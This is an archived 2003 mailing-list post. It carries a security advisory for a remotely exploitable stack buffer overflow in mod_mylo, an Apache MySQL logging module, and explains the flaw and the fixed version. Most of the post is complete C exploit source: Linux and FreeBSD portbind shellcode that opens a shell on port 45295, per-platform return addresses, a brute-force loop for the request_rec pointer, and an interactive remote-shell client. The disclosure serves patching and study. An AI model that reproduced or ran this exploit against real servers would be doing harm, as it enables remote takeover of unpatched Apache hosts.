TUCoPS :: Web :: Apache :: bt742.txt

Remotely exploitable overflow in mod_mylo for Apache


--Boundary-00=_5dTJ/wflwJTHfBU
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


There exists a remotely exploitable buffer overflow in the mod_mylo module for 
apache. 

It is a relatively obscure MySQL logging module for Apache that appears not to 
be in widespread use at present. However, it is present in FreeBSD ports, so 
may affect FreeBSD slighly more than Linux systems.

Advisory + exploit attached.

Regards,
Carl


--Boundary-00=_5dTJ/wflwJTHfBU
Content-Type: text/plain;
  charset="us-ascii";
  name="CLIVITT-2003-5 (apache+mod_mylo).txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="CLIVITT-2003-5 (apache+mod_mylo).txt"

________________________________________________________________________

                Security Vulnerability Advisory
________________________________________________________________________

Product:                mod_mylo (Apache 1.3.x module)
Versions:               <=3D 0.2.1
Author:			=D8yvind Gr=F8nnesby
Homepage:		http://www.pvv.ntnu.no/~oyving/code/mod_mylo/
Platforms:              Linux/BSD
Impact:                 Remote code execution
Advisory:               CLIVITT-2003-5
Author:	                Carl Livitt (carllivitt at hush dot com)
Date:                   July 28, 2003

________________________________________________________________________

Problem Description:

 Mod_mylo is an Apache module designed to log HTTP requests to a MySQL
 database.

 Insufficient bounds checking on a buffer in the logging section of the
 code could allow a remote attacker to overwrite saved data on the stack
 and execute commands under the privileges of the Apache daemon user,
 typically 'www'.

 This software is so unpopular it probably only affects a handful of
 users. The main category of people affected will probably be those that
 have FreeBSD and mod_mylo installed from the ports collection.

________________________________________________________________________

Problem Details:

 In the main logging function, mylo_log(), there is a buffer on the
 stack called reqstr:

   char query[MYLO_MAXQLEN], reqstr[MYLO_MAXQLEN];

 This is poulated by a call to mysql_real_escape_string():

   mysql_real_escape_string(connection, reqstr, r->the_request,
                                 strlen(r->the_request));

 The upper length of data to be placed into reqstr[] is determined by
 the length of the HTTP request, not the length of the reqstr[] buffer.
 Thus, it is possible to construct a large HTTP request containing some
 shellcode and a malicious RET address, overwrite the saved EIP and
 execute arbitrary machine code in the context of the Apache user.

 A exploit string would generally be sent to port 80 of the target box
 and would look like this:

   GET AAAAAAA(4104 A's[linux] / 4096 A's[freeBSD])RRRRPPPP

 Where RRRR is a malicious EIP and PPPP is the address of a pointer
 to an Apache request_rec structure that _must_ be valid in order for
 the exploit to succeed. The pointer needs to be reconstructed because
 overwriting EIP sets the least significat 8-bits of the pointer to
 NULL. The address of this pointer can be brute-forced without much
 trouble.

_______________________________________________________________________

Vendor notification timeline:

 17 July 2003: Notified author
 19 July 2003: Author responded to say fix will be out in 1 week
 28 July 2003: New package tested and available.

_______________________________________________________________________

Updated Packages:

 Fixed, non-vulnerable version of the module is available from:

 	http://www.pvv.ntnu.no/~oyving/code/mod_mylo/

 Versions >=3D 0.2.2 are not vulnerable, all others are exploitable.

________________________________________________________________________

Advisory Author Details:

 Email: carllivitt at hush dot com

_______________________________________________________________________

Exploit Sourcecode:

/*
  Apache + mod_mylo remote exploit
  By Carl Livitt / July 2003
  carllivitt at hush dot com

  Public release - Linux and FreeBSD targets.
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>
#include <stdarg.h>

#define SIZ 8096
#define HTTP_PORT 80
#define SHELL_PORT 45295
#define SOCKET_ERR -2
#define CONNECT_ERR -3
#define HOST_NOT_RESOLVED -4
#define BRUTE_FORCE_EXHAUSTED -5
#define SHELL_NOT_FOUND -7
#define SUCCESS 1
#define FAILED 0

// The following shellcode had 0x3f (?) chars in it which
// cause termination of our HTTP GET before the whole
// shellcode is written to the stack. The 0x3f's are
// needed because they are the dup2() syscall numbers. So,
// I've changed them to 0x3e's and INC'd them before doing
// an INT 0x80. Other than that, this shellcode is eSDee's.
// --------
// linux x86 shellcode by eSDee of Netric (www.netric.org)
// 200 byte - forking portbind shellcode - port=3D0xb0ef(45295)
char linux_shellcode[]=3D
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
        "\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
        "\x89\xc1\x31\xc0\x31\xdb\x50\x50"
        "\x50\x66\x68\xb0\xef\xb3\x02\x66"
        "\x53\x89\xe2\xb3\x10\x53\xb3\x02"
        "\x52\x51\x89\xca\x89\xe1\xb0\x66"
        "\xcd\x80\x31\xdb\x39\xc3\x74\x05"
        "\x31\xc0\x40\xcd\x80\x31\xc0\x50"
        "\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
        "\x80\x89\xd7\x31\xc0\x31\xdb\x31"
        "\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
        "\x80\x31\xc0\x31\xdb\x50\x50\x57"
        "\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
        "\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
        "\xcd\x80\x39\xc3\x75\x40\x31\xc0"
        "\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
        "\x31\xc9\x89\xf3\xb0\x3e\xfe\xc0\xcd\x80"
        "\x31\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31"
        "\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31\xc0"
        "\x50\x68\x2f\x2f\x73\x68\x68\x2f"
        "\x62\x69\x6e\x89\xe3\x8b\x54\x24"
        "\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
        "\x80\x31\xc0\x40\xcd\x80\x31\xc0"
        "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

// This shellcode is unchanged (why reinvent the wheel ?):
// --------
/* BSD x86 shellcode by eSDee of Netric (www.netric.org)
 * 194 byte - forking portbind shellcode - port=3D0xb0ef(45295)
 */
char freebsd_shellcode[]=3D
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53"
        "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
        "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
        "\x50\x50\x66\x68\xb0\xef\xb7\x02"
        "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
        "\x53\x51\x57\x50\xb0\x68\xcd\x80"
        "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
        "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
        "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
        "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
        "\xe2\x50\x51\x52\xb3\x14\x53\x50"
        "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
        "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
        "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
        "\x39\xc3\x75\x44\x31\xc0\x57\x50"
        "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
        "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
        "\x80\x31\xc0\x43\x53\x56\x50\xb0"
        "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
        "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
        "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
        "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
        "\xeb\x9a";

struct {
        char *platform;
        unsigned long bruteStart, bruteEnd;
        unsigned long retAddr;
        int offset, len;
        char *shellcodePtr;
} targets[]=3D {
        { "SuSE 8.1, Apache 1.3.27 (installed from source) (default)", 0x08=
117c04, 0x08117dff, 0xbfffe9f0, 500, 4104, linux_shellcode },
        { "RedHat 7.2, Apache 1.3.20 (installed from RPM)", 0x08105104, 0x0=
81051ff, 0xbfffe0b0, 1000, 4104, linux_shellcode },
        { "RedHat 7.3, Apache 1.3.23 (installed from RPM)", 0x080ef304, 0x0=
80ef3ff, 0xbfffe190, 750, 4104, linux_shellcode },
        { "FreeBSD 4.8, Apache 1.3.27 (from Ports)", 0x080bf004, 0x080bf0ff=
, 0xbfbfea50 ,3500, 4096, freebsd_shellcode },
        NULL
};

char usage[]=3D
"Apache + mod_mylo remote exploit\n"
"By Carl Livitt (carllivitt at hush dot com)\n\n"
"Arguments: \n"
"  -t target       Attack 'target' host\n"
"  -T platform     Use parameters for target 'platform'\n"
"  -h              This help.\n";

void my_send(int, char *, ...);
void my_recv(int);
void make_exploitbuf(char *);
int connect_to_host(int);
int attempt_exploit(void);
void my_sleep(int n);

unsigned long retAddr=3D0,magic_r=3D0,MAGIC_R_START,MAGIC_R_END, exactPoint=
erAddy=3D0;
char buf[SIZ], host[SIZ]=3D"";
int useTarget=3D0;
struct hostent *hostStruct;

main(int argc, char **argv) {
        int ch, i;

        while((ch=3Dgetopt(argc, argv, "t:T:e:hr:"))!=3D-1) {
                switch(ch) {
                        case 't':
                                strncpy(host, optarg, SIZ-1);
                                break;
                        case 'T':
                                useTarget=3Datoi(optarg);
                                break;
                        case 'e':
                                exactPointerAddy=3Dstrtoul(optarg,NULL,16);
                                break;
                        case 'r':
                                retAddr=3Dstrtoul(optarg,NULL,16);
                                break;
                        case 'h':
                        default:
                                printf("%s\n",usage);
                                printf("Available platforms:\n");
                                for(i=3D0;targets[i].platform;i++)
                                        printf("%2d. %s\n", i, targets[i].p=
latform);
                                printf("\n");
                                exit(0);
                                break; // it's good practice :)
                }
        }

        // Sanity check
        if(!retAddr && exactPointerAddy) {
                printf("[*] You must give RET address when specifying a poi=
nter address\n");
                printf("    A good place to start is 0xbfffe0b0(linux) or 0=
xbfbfe0b0(freeBSD)\n");
		printf("    Also remember to pass a -T x flag... things will be unpredict=
able\n");
		printf("    if you don't!\n");
                exit(0);
        }

        if((hostStruct=3Dgethostbyname(host))=3D=3DNULL) {
               printf("[*] Couldn't resolve host %s\nUse '%s -h' for help\n=
", host,argv[0]);
                exit(0);
        }

        switch(attempt_exploit()) {
                case HOST_NOT_RESOLVED:
                        printf("[*] Couldn't connect to host: %s not found.=
\n", host);
                        break;
                case SOCKET_ERR:
                        printf("[*] Couldn't grab a socket!\n");
                        break;
                case CONNECT_ERR:
                        printf("[*] Connection to %s was rejected\n",host);
                        break;
                case SHELL_NOT_FOUND:
                        printf("[*] This attempt failed ...\n");
                        break;
                case BRUTE_FORCE_EXHAUSTED:
                        printf("[*] Bruteforce failed.\n");
                        break;
                case SUCCESS:
                        break;
                default:
                        printf("[*] ERROR: There was no error!\n");
                        break;
        }

        printf("\nHave a nice day!\n");
        exit(0);
}

int attempt_exploit(void) {
	fd_set rfds;
	int sock,retVal,r;

	if(exactPointerAddy) {
		printf("[-] Using 0x%08x for pointer addy\n", exactPointerAddy);
		if((sock=3Dconnect_to_host(HTTP_PORT))<=3D0)
			return sock;
		magic_r=3DexactPointerAddy;
		make_exploitbuf(buf);
		my_send(sock, buf);
		my_recv(sock);
		close(sock);
		my_sleep(100000);
                if((sock=3Dconnect_to_host(SHELL_PORT))<=3D0) {
			return sock;
		}
	} else { // Do crappy bruteforce loop
		printf("[-] Attempting attack [ %s ] ...\n", targets[useTarget].platform);
		MAGIC_R_START=3Dtargets[useTarget].bruteStart;
		MAGIC_R_END=3Dtargets[useTarget].bruteEnd;
		retAddr=3Dtargets[useTarget].retAddr;
		for(magic_r=3DMAGIC_R_START; magic_r<=3DMAGIC_R_END; magic_r++) {
			printf("[-] Trying 0x%08x ... \r", magic_r);fflush(stdout);
			if((sock=3Dconnect_to_host(HTTP_PORT))<=3D0)
				return sock;
			make_exploitbuf(buf);
			my_send(sock, buf);
			my_recv(sock);
			close(sock);
			my_sleep(50000);
			if((sock=3Dconnect_to_host(SHELL_PORT))>=3DSUCCESS) {
				printf("\n[-] Found request_rec address @ 0x%08x\n", magic_r);
				break;
			}
		}
		if(magic_r>MAGIC_R_END)
			return BRUTE_FORCE_EXHAUSTED;
	}

        printf("[-] Connected to %s! You can type commands now:\n", host);

        // Now let the attacker issue commands to the remote
        // shell, just as if (s)he had launched 'nc host 45295'.
        do {
                FD_ZERO(&rfds);
                FD_SET(0, &rfds);
                FD_SET(sock, &rfds);
                retVal=3Dselect(sock+1, &rfds, NULL, NULL, NULL);
                if(retVal) {
                        if(FD_ISSET(sock, &rfds)) {
                                buf[(r=3Drecv(sock, buf, SIZ-1,0))]=3D'\0';=
 // bad!
                                printf("%s", buf);
                        }
                        if(FD_ISSET(0, &rfds)) {
                                buf[(r=3Dread(0, buf, SIZ-1))]=3D'\0'; // b=
ad!
                                send(sock, buf, strlen(buf), 0);
                        }

                }
        } while(retVal && r); // loop until connection terminates

        close(sock);
        return SUCCESS;
}

// Given a port number, connects to an already resolved hostname...
// connects a TCP stream and returns a socket number (or returns error)
int connect_to_host(int p) {
        int sock;
        struct sockaddr_in saddr;

        if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))=3D=3D-1)
                return SOCKET_ERR;
        memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
        saddr.sin_family=3DAF_INET;
        saddr.sin_addr.s_addr=3D*((unsigned long *)hostStruct->h_addr_list[=
0]);
        saddr.sin_port=3Dhtons(p);
        if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
                close(sock);
                return CONNECT_ERR;
        } else
                return sock;
}

void make_exploitbuf(char *b) {
        unsigned long *ptr;
        char *sc=3D(char *)&targets[useTarget].shellcodePtr[0];

        memset(b,0x00,SIZ-1);
        strcat(b,"GET ");
        memset(b+4,0x90,targets[useTarget].len);
        memcpy((b+targets[useTarget].len)-(strlen(sc)+targets[useTarget].of=
fset)-9,sc,strlen(sc));
        ptr=3D(unsigned long *)&b[strlen(b)];
        *(ptr++)=3DretAddr;
        *ptr=3Dmagic_r;
        strcat(b, "\n\n");
}

// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...) {
        va_list ap;
        char *buf;

        va_start(ap,b);
        vasprintf(&buf,b,ap);
        send(s,buf,strlen(buf),0);
        va_end(ap);
        free(buf);
}

// Another handy function to read data from a socket.
void my_recv(int s) {
        int len;
        char buf[SIZ];

        len=3Drecv(s, buf, SIZ-1, 0);
        buf[len]=3D0;
}

// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n) {
        struct timespec t;
        t.tv_sec=3D0;
        t.tv_nsec=3Dn;
        nanosleep(&t,&t);
}

--Boundary-00=_5dTJ/wflwJTHfBU--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH